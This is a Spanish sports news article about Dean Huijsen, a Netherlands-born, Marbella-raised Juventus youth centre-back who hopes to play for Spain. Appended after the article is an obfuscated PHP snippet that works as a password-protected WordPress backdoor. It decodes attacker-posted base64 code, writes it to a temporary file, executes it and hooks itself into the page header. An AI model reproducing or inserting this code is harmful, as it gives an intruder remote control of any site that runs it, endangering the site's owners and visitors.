Huijsen, la joya de la Juventus que elige jugar con España

Es central, tiene 18 años, nació en Países Bajos, pero se ha criado en Marbella. Es una de las estrellas de la cantera juventina. Podría ser el jefe de la defensa de la Selección en el Mundial 2030.

Dean Huijsen (18 años) es una de las joyas del filial de la Juventus, club al que llegó en 2021, procedente del Málaga. A pesar de haber nacido en Países Bajos, el central se considera también español, puesto que a los cinco años su familia se trasladó a vivir a Marbella y ha pasado la mayor parte de su corta edad en tierras andaluzas. De ahí que su sueño, tal y como ha podido saber AS, es llegar algún día a ser internacional con España, aunque ya ha jugado con Países Bajos en categoría Sub-19, Sub-18 y Sub-17. En el caso de que la RFEF le considere un futbolista interesante para el futuro de la Selección, Huijsen no lo dudaría y daría el paso de renunciar a Países Bajos para jugar con España. A partir de ese momento, se tendrían que iniciar los trámites de nacionalización por el proceso de carta de naturaleza, como sucedió con Le Normand hace unos meses.

En Italia se deshacen en elogios hacia Dean Huijsen y le señalan como el futuro jefe de la zaga juventina. Es un central de 1,95, que destaca por su poderío aéreo, el cual aprovecha para ver puerta con cierta facilidad. No en vano, en Turín le conocen como “el defensa goleador”. Además, es ambidiestro y tiene una buena salida de balón. Su gran potencial no pasó de desapercibido para los dos gigantes de España. Tanto Barcelona como Real Madrid sondearon su fichaje hace dos años, aunque finalmente el proyecto de la Juventus le convenció más.

Por supuesto, es titular indiscutible en el equipo filial de la Juventus. El técnico Massimiliano Allegri tiene muy buenas referencias de él y es habitual que se ejercite con el primer equipo. De hecho, este verano ya le utilizó en varios amistosos, como el disputado contra el Real Madrid en Orlando. El central disputó en ese encuentro 17 minutos. Por edad y calidad Huijsen podría ser el jefe de la defensa española en el Mundial 2030.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}